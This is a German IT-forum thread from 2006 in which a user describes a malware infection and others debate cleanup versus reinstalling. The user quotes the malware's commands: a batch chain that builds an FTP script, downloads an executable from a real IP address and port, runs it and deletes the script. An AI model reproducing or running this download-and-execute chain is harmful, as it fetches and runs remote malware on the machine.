Herbert Leitner 10 Geschrieben 20. November 2006 Melden Teilen Geschrieben 20. November 2006 Hallo! Ich bin sicher, ich habe mir einen Virus gefangen. Mehrmals täglich popt plötzlich eine Eingabeaufforderung auf, und dort wird Zeichen für Zeichen ein Befehl geschriben. Leider ist das so penetrant, daß ich es noch nicth ganz abfangen konnte. Ein Teil des Befehls sieht so aus: exe >> i &echo quit >> i &ftp -n -s:i &262.exe&del i&exit Ich habe gesehen, daß versucht wird, per FTP eine Datei down zu loaden. Das ist auch deswegen extrem ärgerlich, weil die Zeichen einfach in die aktive Antwendung geschriben werden. Wenn z.B: Excel offen ist, dann beginnt der Text in der Zelle zu schreiben. Ich habe alle möglichen Antiviren - Programme laufen lassen. Natürlich habe die die Festplatte in eine garantiert saubere Maschine eingebaut. Alle AV - Programme sagen mit, daß ich sauber bin. Ich bin aber ganz sicher nicht sauber! Die Autostarteinträge sind OK (Autoruns), die TCP - Verbindungensind OK (TCPView), und dennoch, mehrmals täglich popt das Fenster auf! Was könnte das sein? tks! Herbert Zitieren Link zu diesem Kommentar
derwUwu 10 Geschrieben 20. November 2006 Melden Teilen Geschrieben 20. November 2006 Hallo, mal einen Prozessexplorer laufen lassen und überprüfen was im Hintergrund läuft. Regedit -> Runs und auch shell Eintrag überprüfen, dort kann auch ein Starteintrag vorhanden sein der einfach so nicht zu erkennen ist (z.B. n haufen leerstellen vor dem Eintrag selbst). Was für ein OS wird verwendet ? Wird die Autoexec mit verarbeitet ? Bis dahin. Zitieren Link zu diesem Kommentar
Sigma 10 Geschrieben 20. November 2006 Melden Teilen Geschrieben 20. November 2006 Hi, am besten Platte ausbauen und in einem anderen PC scannen lassen. Die (manuelle) Suche nach Rootkits dabei nicht vergessen. Alternativ geht das auch mit BartPE bzw. WinPE. Wenn beides nicht möglich sein sollte, sieht's zumindest prinzipiell schlecht aus. ProcessExplorer und File/Regmon sind aber erstmal eine Möglichkkeit nachzuvollziehen, was eigentlich überhaupt geschieht. Tschau, Sigma Zitieren Link zu diesem Kommentar
vmc-mcse 10 Geschrieben 20. November 2006 Melden Teilen Geschrieben 20. November 2006 Hallo, probier mal DR.WEB aus..hat mir schon sehr oft geholfen Dr.Web Virusscan [Online-Distributor Info] Zitieren Link zu diesem Kommentar
hannes147 10 Geschrieben 21. November 2006 Melden Teilen Geschrieben 21. November 2006 Hi Leute, Viele Viren kann man auch ohne Scan entfernen. Ich machs immer so. 1. vom Netz nehmen 2.Temp user+internet löschen 3.System32 dateien anzeigen lassen --> nach änderungsdatum sortieren --> auffällige Dateien, die erst kürzlich erstellt wurden löschen 4.mit Hijackthis die Startup programme bearbeiten in 80% läuft dann wieder alles. Zitieren Link zu diesem Kommentar
randy 10 Geschrieben 21. November 2006 Melden Teilen Geschrieben 21. November 2006 also ich würde auch auf spyware tippen ! Zitieren Link zu diesem Kommentar
Hansi 10 Geschrieben 21. November 2006 Melden Teilen Geschrieben 21. November 2006 man sollte als erstes, egal ob du es mit tool oder "per Hand":cool: versuchst, die automtische Systemwiederherstellung deaktivieren. Sonst sind beim nächsten Neustart die meisten Sachen wieder auf deinem System. Zitieren Link zu diesem Kommentar
Herbert Leitner 10 Geschrieben 21. November 2006 Autor Melden Teilen Geschrieben 21. November 2006 Hallo! Der Onlinescanner von Mcaffe hat folgende Datei gefunden: C:\Dokumente und Einstellungen\<user>\i (ja, einfach nur i, steht vermutlich für "Input") Mit diesem Inhalt: open 81.10.156.100 30350 user 1 1 get 306.exe quit Damit wird ein FTP - Client gestartet und eine Datei von dem Server herunter geladen. In dem gleichen Verzeichnis waren etwa 10 *.exe - Dateien, alle mit 0 Byte Länge und mit einer 4 oder 5 stelligen Zahl als Nahmen. Komisch, mit 0 Byte können diese nicht viel Unheil anrichten! Gruß! Herbert Zitieren Link zu diesem Kommentar
Sigma 10 Geschrieben 21. November 2006 Melden Teilen Geschrieben 21. November 2006 Hi, wahrscheinlich sind das gescheiterte oder eben gerade laufende Downloads von dem genannten ftp-Server. Dir ist sicherlich klar, das der Rechner nie wieder vertrauenswürdig sein kann, ohne das das BS neuinstalliert wird. Tschau, Sigma Zitieren Link zu diesem Kommentar
Herbert Leitner 10 Geschrieben 21. November 2006 Autor Melden Teilen Geschrieben 21. November 2006 Hi, Dir ist sicherlich klar, das der Rechner nie wieder vertrauenswürdig sein kann, ohne das das BS neuinstalliert wird. Sigma Nein, das sehe ich nicht so! Und zwar aus folgenden Punkten: 1.) Software steckt immer voller Fehler. So gesehen sollte ich also keiner Maschine trauen. Und doch tue ich das täglich. 2.) Auch wenn zur Zeit kein Virus im System ist, so muss ich doch davon ausgehen, das sich das in einigen Sekunden, Stunden Tagen ... ändert. So gesehen sollte ich also keiner Maschine trauen. Und doch tue ich das täglich. 3.) Viele Leute haben Viren über einem längeren Zeitraum im System, wissentlich oder unwissentlich. Und doch funktioniert alles So gesehen sollte ich also keiner Maschine trauen. Und doch tue ich das täglich. 4.) Ich höre immer wieder den Satz, daß ich einem Computer nicht trauen kann, weil ein Virus drauf ist. 80% Aller Computer hatten bereits einen Virus So gesehen sollte ich also keiner Maschine trauen. Und doch tue ich das täglich. 5.) In all den Jahren hatte ich erst eine Handvoll "Installationen" wegen eines Virus verloren. Alle anderen haben sich mehr oder weniger wieder säubern lassen. So gesehen sollte ich also keiner Maschine trauen. Und doch tue ich das täglich. 6.) Es gibt Server die von einem Virus befallen sind. Und doch kann es sein, daß es besser ist, diesen weiter seinen Dienst tun zu lassen und im Hintergrund zu säubern als diesen neu zu installieren So gesehen sollte ich also keiner Maschine trauen. Und doch tue ich das täglich. 7.) Die Installation dauert in der Regel länger als die Reinigung. Da mich auch niemand garantieren kann, daß die Maschine nach der neuen Installation sauber ist, sehe ich keinen Unterschied zwischen einer gereinigten Maschine und einer neu installierten Maschine! Viren sind ein (riseiges!) Problem, ich weiß das sehr gut. Ich kann aber nicht verstehen, wenn jemand sofort nach einer neuen Installation schreit. Ich habe in den letzten Jahren tausende von Viren gesehen (naja, gefunden eben) und mußte nur eine Handvoll Maschinen neu installieren weil ich dem Virus nicht Herr geworden bin! Gruß und Dank! Herbert Zitieren Link zu diesem Kommentar
grizzly999 11 Geschrieben 22. November 2006 Melden Teilen Geschrieben 22. November 2006 Ich traue auch täglich allen meinen Rechnern, aber keiner, auf der ein Virus aktiv war, und schon gar nicht einer, der was per FTP runterladen wollte. Dir ist "Root Kit" ein Begriff? Diese findet wohl kein Virenscanner, nicht mal der geschätzte Mark Russinovich traut sich zu, mit sienem RootKit Revelaer alle/welche zu finden. Traue der Maschine nicht mehr. Mache sie platt ;) grizzly999 Zitieren Link zu diesem Kommentar
WSUSPraxis 48 Geschrieben 22. November 2006 Melden Teilen Geschrieben 22. November 2006 @Herbert Leitner Ich jetzt persönlich finde diese Einstellung im produktiven Einsatz auch sehr bedenklich. Ich glaube dem was Grizzly sagt ist wenig hinzuzufügen. Zitieren Link zu diesem Kommentar
blub 115 Geschrieben 22. November 2006 Melden Teilen Geschrieben 22. November 2006 4.) Ich höre immer wieder den Satz, daß ich einem Computer nicht trauen kann, weil ein Virus drauf ist. 80% Aller Computer hatten bereits einen Virus So gesehen sollte ich also keiner Maschine trauen. Und doch tue ich das täglich in was für einer Umgebung arbeitest du?? Zitieren Link zu diesem Kommentar
Herbert Leitner 10 Geschrieben 22. November 2006 Autor Melden Teilen Geschrieben 22. November 2006 Ich traue auch täglich allen meinen Rechnern, aber keiner, auf der ein Virus aktiv war, und schon gar nicht einer, der was per FTP runterladen wollte. Dir ist "Root Kit" ein Begriff? Diese findet wohl kein Virenscanner, nicht mal der geschätzte Mark Russinovich traut sich zu, mit sienem RootKit Revelaer alle/welche zu finden. Traue der Maschine nicht mehr. Mache sie platt ;) grizzly999 Hallo! Ja, die leidige Sache mti den Rootkits (Verbrecher sind das!). Gehen wir von volgendem aus: 1.) ich baue die (versäuchte) Platte aus 2.) ich schließe sie an einen garantiert sauberen Rechne ran 3.) ich starte hoch und passe tunlichts auf, daß von der verseuchten Platten ichts gestartet wird 3.) ich scann die Platte So gesehen ist ein Rootkit wohl nichts anderes als ein anderer Virus. Ich sehe nicht, waurm es prinzipiell unmöglich sein soll, diesen zu finden. Die Informationen des Virus können doch wohl nur vorhnden sein 1.) im MBR, BS 2.) als separate Datei irgendwo 3.) als Informationen in einer anderen (gewöhnlichen) Datei irgenwo Es wird wohl nie eine Möglichkeit geben, 100%ig zu garantieren, daß eine Maschine frei ist von Viren. Also muss ich wohl jeder Maschine misstrauen. Aber wie gesagt: Mir ist die Problematik sehr wohl bewußt und ich ägere mich immer wieder ab mit REchner die "voller" Viren sind! Die Anwender sind zum Teil sowas von naiv! Gruß und Dank! Herbert Zitieren Link zu diesem Kommentar
Velius 10 Geschrieben 22. November 2006 Melden Teilen Geschrieben 22. November 2006 Ein Rootkit ist insofern anders da es nicht wie ein typischer Virus verhält (an eine Datei anhängen & kopieren/sonstige Befehle ausführen), sondern sich for dem OS Kernel versteckt. Mit dem MBR hat das meist nicht viel zu tun, dann eher mit dem Filesystem, denn das Rootkit interagiert ja mit dem OS und vom MBR aus ohne wissen vom FS wäre das schwer möglich. In der Tat müsste irgendwo in der Partitiontable etwas vom Rootkit zu finden sein, nur der Os Kernel kanns nicht lesen, sehen, hat kein Zugriff oder sonst was. So arbeiten Rootkits.... Zitieren Link zu diesem Kommentar
Empfohlene Beiträge
Schreibe einen Kommentar
Du kannst jetzt antworten und Dich später registrieren. Falls Du bereits ein Mitglied bist, logge Dich jetzt ein.